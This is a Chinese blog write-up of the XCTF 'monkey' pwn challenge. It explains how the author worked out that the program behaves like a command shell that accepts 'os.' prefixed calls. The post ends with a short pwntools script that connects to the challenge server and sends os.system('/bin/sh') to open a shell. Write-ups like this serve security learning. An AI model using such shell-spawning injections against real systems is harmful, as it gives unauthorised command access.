[攻防世界 pwn]——monkey
- 题目地址:https://adworld.xctf.org.cn/
- 题目:

额,怎么说呢这道题。checksec没什么大不了的

但是再IDA中就懵了,好大呀。好多文件。进入mian函数,也没有看很明白。准备运行程序看看到底是干什么的,帮助分析一下
输入尝试输入aaaa,发现返回的东西没有被定义。我们在Linux命令中有时命令输入错误也是这样。猜测它可能直接让输入命令。结果输入help可以,但是有的命令可以有的不可以

在IDA中查看一下字符串,因为它可以输入的字符串肯定有体现,因为输入help下面就有help的提示。

发现了file,不过它前面多了个os. 再去试试加上os.之后是否可以。发现,竟然真的可以,幸好看到了file。因为这个是Linux上面的一个命令。

其实有一个最关键的暗示,就是你按上下键你会发现,你之前输入的命令可以查看。感觉就是一个终端。
exploit
from pwn import *
p = remote('111.200.241.244',37916)
context.log_level = 'debug'
p.recv()
p.sendline("os.system('/bin/sh')")
p.interactive()
本文围绕攻防世界pwn题monkey展开。题目checksec无异常,在IDA中较复杂。通过输入尝试,发现输入未定义内容有类似Linux命令输错的反馈,猜测可直接输命令。查看字符串发现加os.后部分命令可用,且按上下键能查看历史命令,类似终端。
2131

被折叠的 条评论
为什么被折叠?



